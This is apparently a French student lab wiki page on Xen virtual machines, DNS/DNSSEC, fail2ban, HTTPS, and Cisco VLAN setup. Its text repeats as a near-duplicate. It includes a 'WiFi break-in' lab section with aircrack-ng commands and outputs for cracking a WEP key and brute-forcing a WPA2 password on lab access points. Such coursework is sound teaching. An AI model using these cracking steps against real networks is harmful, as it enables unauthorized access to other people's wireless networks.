root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight><syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight><syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight><syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]

</syntaxhighlight>modif le fichier <code>/etc/fstab</code> :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>sur terminal<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
</syntaxhighlight>ensuite : <syntaxhighlight>
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight><syntaxhighlight lang="bash">
auto eth0
iface eth0 inet static
address 172.10.0.1/24

auto eth1
iface eth1 inet static
address 193.48.57.169/27
gateway 193.48.57.162

</syntaxhighlight>accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

=== Effraction WIFI ===

==== premiere partie ====
On travaille sur la zabeth13 parce que cette machine a une carte réseau fonctionnelle pour faire le TP.

La commande suivante permet de d'identifier l'interface WIFI qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlan1

Donc nous pouvons lancer la commande suivante afin d'identifier l'adresse IP de notre cracotte14.<syntaxhighlight lang="bash">
sudo airodump-ng wlan1
</syntaxhighlight>Dans la liste nous avons en effet la cracotte14 sur le channel 4 et l'adresse ip suivante<syntaxhighlight lang="bash">
04:DA:D2:9C:50:5D -62 231 0 0 4 54e. WEP WEP cracotte14
</syntaxhighlight>Enfin nous pouvons lancer la commande<syntaxhighlight lang="bash">
sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:5d -c4 --write log_airodump
</syntaxhighlight>Dans notre cas la carte réseau de la zabeth13 disfonctionne. Donc Mr Redon me donne une cléUSB Wifi pour pouvoir travailler. De plus les cracotte s'arrête au 13 donc je dois prendre la cracotte02.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Après un certain temps on peut entrer la commande suivante pour voir si un résultat à été trouvé<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un KEY FOUND !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

==== Seconde partie ====
On s'interesse maintenant à la kracotte02 via la commande précédente on trouve :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un fichier Python un dictionnaire contenant toutes les possibilités sur 8 chiffres. Pour lancer ce programme on utilise Python3<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Le commande suivante doit être lancée<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Enfin on peut lancer la méthode par force brute via la commande suivante<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>Le résutat peut-être observé via la commande :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight><syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-10T17:18:22Z

Abiernac :

=== Projet de virtualisation ===

==== Atelier système et réseau, les machines virtuelles ====

===== Création des machines virtuelles =====
Nous avons créé deux machines avec les commandes suivantes :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight><syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight><syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight><syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]

</syntaxhighlight>modif le fichier <code>/etc/fstab</code> :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>sur terminal<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
</syntaxhighlight>ensuite : <syntaxhighlight>
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight><syntaxhighlight lang="bash">
auto eth0
iface eth0 inet static
address 172.10.0.1/24

auto eth1
iface eth1 inet static
address 193.48.57.169/27
gateway 193.48.57.162

</syntaxhighlight>accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

=== Effraction WIFI ===

==== premiere partie ====
On travaille sur la zabeth13 parce que cette machine a une carte réseau fonctionnelle pour faire le TP.

La commande suivante permet de d'identifier l'interface WIFI qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlan1

Donc nous pouvons lancer la commande suivante afin d'identifier l'adresse IP de notre cracotte14.<syntaxhighlight lang="bash">
sudo airodump-ng wlan1
</syntaxhighlight>Dans la liste nous avons en effet la cracotte14 sur le channel 4 et l'adresse ip suivante<syntaxhighlight lang="bash">
04:DA:D2:9C:50:5D -62 231 0 0 4 54e. WEP WEP cracotte14
</syntaxhighlight>Enfin nous pouvons lancer la commande<syntaxhighlight lang="bash">
sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:5d -c4 --write log_airodump
</syntaxhighlight>Dans notre cas la carte réseau de la zabeth13 disfonctionne. Donc Mr Redon me donne une cléUSB Wifi pour pouvoir travailler. De plus les cracotte s'arrête au 13 donc je dois prendre la cracotte02.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Après un certain temps on peut entrer la commande suivante pour voir si un résultat à été trouvé<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un KEY FOUND !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

==== Seconde partie ====
On s'interesse maintenant à la kracotte02 via la commande précédente on trouve :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un fichier Python un dictionnaire contenant toutes les possibilités sur 8 chiffres. Pour lancer ce programme on utilise Python3<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Le commande suivante doit être lancée<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Enfin on peut lancer la méthode par force brute via la commande suivante<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>Le résutat peut-être observé via la commande :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight><syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
